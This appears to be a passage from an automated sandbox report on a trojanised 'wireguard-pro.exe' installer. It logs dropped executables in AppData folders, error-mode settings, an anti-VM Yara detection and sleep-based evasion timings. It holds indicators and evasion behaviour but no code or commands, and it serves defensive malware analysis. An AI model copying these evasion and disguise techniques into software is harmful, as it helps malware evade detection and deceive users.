Source: C:\Users\user\Desktop\wireguard-pro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\WireGuard\wireguard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: HQL82NEF.exe PID: 5160, type: MEMORYSTR

Source: C:\Users\user\Desktop\wireguard-pro.exe TID: 6360	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599541s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599436s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -599108s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598884s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598784s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598659s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598534s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598150s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -598040s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -597927s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe TID: 7396	Thread sleep time: -60000s >= -30000s	Jump to behavior
